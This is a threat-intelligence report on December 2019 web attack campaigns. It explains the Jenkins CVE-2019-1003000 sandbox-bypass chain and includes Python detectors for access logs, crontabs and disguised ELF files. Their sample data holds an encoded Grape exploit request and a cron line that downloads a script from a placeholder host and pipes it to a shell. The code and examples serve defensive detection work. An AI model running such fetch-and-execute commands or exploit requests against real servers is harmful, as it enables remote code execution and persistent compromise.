Security researchers at F5 Networks constantly monitor web traffic at various locations all over the world. This allows us to detect “in the wild” malware and to gain insight into the current threat landscape.
In December 2019, our researchers detected a 100% increase in new threat campaigns compared to November 2019. This was not surprising: attackers often step up their activity during the busy shopping and holiday season. Here is an overview of the new threat activity.
- Three campaigns targeting Jenkins servers vulnerable to the Jenkins Script Security Plugin Remote Code Execution (RCE) vulnerability (CVE-2019-1003000).
- Two campaigns targeting ThinkPHP servers vulnerable to an RCE vulnerability (CVE-2019-11043). Note that CVE-2019-11043 is assigned to the PHP-FPM env_path_info buffer underflow in PHP 7 (reachable through certain nginx configurations), a bug in the PHP runtime rather than in ThinkPHP itself.
- One campaign targeting Elasticsearch servers vulnerable to a Groovy scripting engine sandbox security bypass vulnerability (CVE-2015-1427).
In addition, the following notable new campaigns were also detected:
- Atlassian Confluence Widget Connector RCE (CVE-2019-3396), web.xml. The campaign aims to identify Confluence servers vulnerable to the Atlassian Confluence Widget Connector RCE vulnerability. The threat actor instructs the server to disclose the contents of the sensitive file web.xml. Reading a known file is a low-noise probe: it confirms that the server is exploitable before a heavier payload is sent.
- Multiple exploits, Mirai ECHOBOT. The campaign uses ECHOBOT, a Mirai malware variant, to exploit known public vulnerabilities. The threat actor instructs the server to download and execute a malicious file from a domain controlled by the actor. If the exploit succeeds, the server joins a botnet for future use. Further analysis of this malware variant was published on F5 Labs in December 2019.
- Drupal 'Drupalgeddon2' RCE, pido (CVE-2018-7600). The campaign aims to identify Drupal web servers vulnerable to the Drupalgeddon2 RCE vulnerability. The threat actor instructs the server to download and execute a malicious bash script.
- Apache Struts2 Jakarta Multipart Parser, YMUCWkU (CVE-2017-5638). The campaign aims to identify Apache Struts 2 based servers vulnerable to the Jakarta Multipart Parser vulnerability. The threat actor instructs the server to add a "YMUCWkU" header to the response with the string 'N9d1GLZpB' as its value. This is a fingerprinting technique: the OGNL expression travels in the request's Content-Type header, and the marker header in the reply tells the scanner which hosts evaluated it without running a real payload.
- DedeCMS savetagfile RCE, shell.lib. The campaign aims to identify DedeCMS servers that are vulnerable to a remote code execution (RCE) vulnerability. The threat actor instructs the server to create a PHP backdoor.
Jenkins Script Security Plugin Remote Code Execution (CVE-2019-1003000)
Jenkins is a free and open source automation server. Jenkins helps to automate the non-human part of the software development process by providing continuous integration and facilitating technical aspects of continuous delivery. We have written about other threats to Jenkins automation servers in multiple F5 Labs articles, the most recent in October 2019 covering the installation of cryptominers.
On January 8, 2019, Jenkins released a security advisory [1] describing a vulnerability in the Script Security Plugin. The sandbox protection could be circumvented during the script compilation phase by applying AST-transforming annotations such as @Grab to source code elements: the sandbox intercepts calls at run time, but Grape resolves and loads the referenced JARs while the script is still being compiled. The vulnerability was reported by Orange Tsai from DEVCORE. A detailed analysis of the vulnerability [2] was published, and multiple threat campaigns were detected shortly thereafter.
To resolve a URL, Jenkins uses dynamic routing, provided by the Stapler web framework. This routing uses a naming convention to turn each path segment into a method call on the object reached so far, and a segment that follows a getter taking a parameter becomes that getter's argument. For example, the URL http://jenkin.local/adjuncts/whatever/class/classLoader/resource/index.jsp/content is resolved as jenkins.model.Jenkins.getAdjuncts("whatever").getClass().getClassLoader().getResource("index.jsp").getContent().
Jenkins also enforces an ACL that limits what a user may reach. Before routing, jenkins.model.Jenkins#getTarget() checks the request path against an allowlist of always-readable URLs; anything outside that list requires the Overall/Read permission, so for an anonymous user with no read/write privileges most pages will not render. Examples of allowlisted paths are /login, /logout, /signup and /securityRealm, which must be reachable without authentication.
By combining this allowlist check with dynamic routing, an attacker can bypass the ACL: the check only sees that the path starts with an allowlisted prefix, while routing keeps walking the remaining segments. For example, the URL gadget /securityRealm/user/[username]/descriptorByName/[descriptor_name]/ is resolved as jenkins.model.Jenkins.getSecurityRealm().getUser([username]).getDescriptorByName([descriptor_name]).
All configurable objects in Jenkins have a descriptor that extends hudson.model.Descriptor, and any class that extends Descriptor can be reached by name through hudson.model.DescriptorByNameOwner#getDescriptorByName(String). hudson.model.User implements that interface, which is what lets the gadget above reach an arbitrary Descriptor from an unauthenticated path.
To achieve pre-authentication RCE, Orange uses Grape, the JAR dependency manager built into Apache Groovy. The processOtherServices() method in class groovy.grape.GrapeIvy reads the file META‑INF/services/org.codehaus.groovy.plugins.Runners from every grabbed JAR and instantiates each class named there. By serving a malicious JAR that lists an attacker-controlled class in that file, a threat actor gets its constructor invoked and executes arbitrary code on the Jenkins server.
Since the release of the PoC exploit, we have seen this vulnerability commonly exploited by threat actors.
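As an added example (not part of the original article and not Jenkins project code), the following Python scanner flags the two halves of this exploit in web-server access logs: the /securityRealm/user/.../descriptorByName/ routing gadget in the path, and Grape annotations in the submitted script. It assumes the script text arrives in a `value` query parameter, as it does in the public PoC against the checkScript form-validation method; the log lines are constructed, with placeholder addresses and a placeholder resolver host.

```python
import re
from urllib.parse import urlsplit, parse_qs

# Combined-log-format access line: client, timestamp, request line, status.
LOG_RE = re.compile(
    r'^(?P<ip>\S+) \S+ \S+ \[(?P<ts>[^\]]+)\] '
    r'"(?P<method>[A-Z]+) (?P<target>\S+) [^"]*" (?P<status>\d{3})'
)
# The routing gadget from the text: /securityRealm is always readable, and from
# there the request walks into a User and then into any Descriptor by class name.
GADGET_RE = re.compile(r'/securityRealm/user/[^/]+/descriptorByName/(?P<descriptor>[^/?]+)')
# Grape annotations applied at compile time, the root cause of CVE-2019-1003000.
GRAPE_RE = re.compile(r'@Grab(?:Config|Resolver|Exclude)?\b')
# Assumption: the script is submitted in a "value" query parameter (the public
# PoC uses the checkScript form-validation endpoint, which reads this name).
SCRIPT_PARAM = "value"

# Constructed sample log lines (placeholder addresses, not real telemetry).
SAMPLE_LOG = """\
203.0.113.7 - - [14/Dec/2019:03:12:51 +0000] "GET /securityRealm/user/admin/descriptorByName/org.jenkinsci.plugins.scriptsecurity.sandbox.groovy.SecureGroovyScript/checkScript?sandbox=true&value=%40GrabConfig%28disableChecksums%3Dtrue%29%0A%40GrabResolver%28name%3D%27x%27%2C+root%3D%27http%3A%2F%2Fexample.invalid%2F%27%29%0A%40Grab%28group%3D%27x%27%2C+module%3D%27y%27%2C+version%3D%271%27%29%0Aimport+x.y HTTP/1.1" 200 23 "-" "python-requests/2.22.0"
198.51.100.9 - - [14/Dec/2019:03:13:02 +0000] "GET /job/build-app/lastBuild/consoleText HTTP/1.1" 200 5123 "-" "Mozilla/5.0"
203.0.113.7 - - [14/Dec/2019:03:13:40 +0000] "GET /securityRealm/user/admin/descriptorByName/org.jenkinsci.plugins.scriptsecurity.sandbox.groovy.SecureGroovyScript/checkScript?sandbox=true&value=println(1) HTTP/1.1" 200 12 "-" "curl/7.64.0"
"""


def parse_line(line):
    """Split one access-log line into its fields, or return None if it does not parse."""
    m = LOG_RE.match(line)
    return m.groupdict() if m else None


def inspect_target(target):
    """Return (descriptor, indicators) for one request target (path plus query)."""
    parts = urlsplit(target)
    indicators = []
    gadget = GADGET_RE.search(parts.path)
    descriptor = gadget.group("descriptor") if gadget else None
    if gadget:
        indicators.append("securityRealm-descriptorByName-gadget")
    # parse_qs percent-decodes, so %40Grab in the raw line becomes @Grab here.
    params = parse_qs(parts.query, keep_blank_values=True)
    script = "\n".join(params.get(SCRIPT_PARAM, []))
    annotations = sorted(set(GRAPE_RE.findall(script)))
    if annotations:
        indicators.append("grape-annotation:" + ",".join(annotations))
    if gadget and annotations:
        # Unauthenticated reach into a Descriptor plus compile-time Grape use is
        # the exploit shape; a bare gadget hit without @Grab is usually recon.
        indicators.append("CVE-2019-1003000-exploit-attempt")
    return descriptor, indicators


def scan_log(text):
    """Return one finding per log line that shows any indicator."""
    findings = []
    for line in text.splitlines():
        rec = parse_line(line)
        if rec is None:
            continue
        descriptor, indicators = inspect_target(rec["target"])
        if indicators:
            findings.append({"ip": rec["ip"], "ts": rec["ts"], "status": rec["status"],
                             "descriptor": descriptor, "indicators": indicators})
    return findings


if __name__ == "__main__":
    for f in scan_log(SAMPLE_LOG):
        print(f["ts"], f["ip"], f["descriptor"], ", ".join(f["indicators"]))
```

The gadget match on its own is worth alerting on even without a Grape annotation: nothing legitimate walks from the security realm into descriptorByName on an anonymous connection, and the recon request usually precedes the real one by seconds from the same address. A 200 status on the exploit line is not proof of success, since form validation returns 200 for any compilable script; correlate with outbound connections from the Jenkins host to the resolver root named in @GrabResolver.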
The initial request instructs the server to connect to aliyun[.]one and fetch a page from it.
The aliyun[.]one page contains the payload to be executed on the vulnerable server. The downloaded payload is a bash script that creates a cron job so the infection persists across reboots and cleanup attempts. It then downloads and executes an ELF binary disguised as a PNG image file; the image extension only fools a casual directory listing, since the file type is given away by its magic bytes.
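An added example, not from the article or the campaign itself, of the two checks an incident responder would run on a Jenkins host after this campaign: parse the crontab for download-and-execute entries, and classify files by magic bytes so that an ELF binary named like an image is caught. The crontab text and file contents below are constructed; example.invalid is a placeholder host, not an indicator.

```python
import re

ELF_MAGIC = b"\x7fELF"
PNG_MAGIC = b"\x89PNG\r\n\x1a\n"
IMAGE_EXTS = (".png", ".jpg", ".jpeg", ".gif")

DOWNLOADER_RE = re.compile(r'\b(?:curl|wget)\b')
PIPE_TO_SHELL_RE = re.compile(r'\|\s*(?:ba)?sh\b')
WRITABLE_DIR_RE = re.compile(r'(?:^|\s|=)(?:/tmp|/var/tmp|/dev/shm)/')

# Constructed crontab, modelled on the download-and-execute persistence described
# above (example.invalid is a placeholder, not a real indicator).
SAMPLE_CRONTAB = """\
# m h  dom mon dow   command
0 3 * * * /usr/bin/certbot renew --quiet
*/10 * * * * (curl -fsSL http://example.invalid/x.sh || wget -qO- http://example.invalid/x.sh) | sh
@reboot /tmp/.X11/logo.png
"""

# Constructed file contents: an ELF header carrying a .png name, and a real PNG signature.
FAKE_PNG = b"\x7fELF\x02\x01\x01\x00" + b"\x00" * 8 + b"\x02\x00\x3e\x00"
REAL_PNG = PNG_MAGIC + b"\x00\x00\x00\x0dIHDR"


def parse_crontab(text):
    """Yield (schedule, command) for each entry, handling @reboot-style schedules."""
    for raw in text.splitlines():
        line = raw.strip()
        if not line or line.startswith("#"):
            continue
        if line.startswith("@"):
            fields = line.split(None, 1)
            if len(fields) != 2:
                continue
            yield fields[0], fields[1]
        else:
            fields = line.split(None, 5)
            if len(fields) < 6:
                continue
            yield " ".join(fields[:5]), fields[5]


def suspicious_cron_entries(text):
    """Flag entries that fetch-and-run remote code or execute from scratch directories."""
    hits = []
    for schedule, command in parse_crontab(text):
        reasons = []
        if DOWNLOADER_RE.search(command) and PIPE_TO_SHELL_RE.search(command):
            reasons.append("downloads and pipes to a shell")
        if WRITABLE_DIR_RE.search(command):
            reasons.append("runs from a world-writable directory")
        if reasons:
            hits.append({"schedule": schedule, "command": command, "reasons": reasons})
    return hits


def file_kind(data):
    """Classify a file by its leading bytes rather than by its name."""
    if data.startswith(ELF_MAGIC):
        return "elf"
    if data.startswith(PNG_MAGIC):
        return "png"
    return "unknown"


def is_masquerading(name, data):
    """True when the name claims an image but the bytes are an ELF executable."""
    return name.lower().endswith(IMAGE_EXTS) and file_kind(data) == "elf"


if __name__ == "__main__":
    for hit in suspicious_cron_entries(SAMPLE_CRONTAB):
        print(hit["schedule"], hit["command"], "->", "; ".join(hit["reasons"]))
    for name, data in (("logo.png", FAKE_PNG), ("logo2.png", REAL_PNG)):
        print(name, file_kind(data), "masquerading" if is_masquerading(name, data) else "ok")
```

On a live host, feed suspicious_cron_entries() the output of crontab -l for every account plus the files under /etc/cron.d and /var/spool/cron, and feed is_masquerading() the first 16 bytes of each file found under /tmp, /var/tmp and /dev/shm. Only the first few bytes are needed, so the check is cheap enough to run across a whole filesystem.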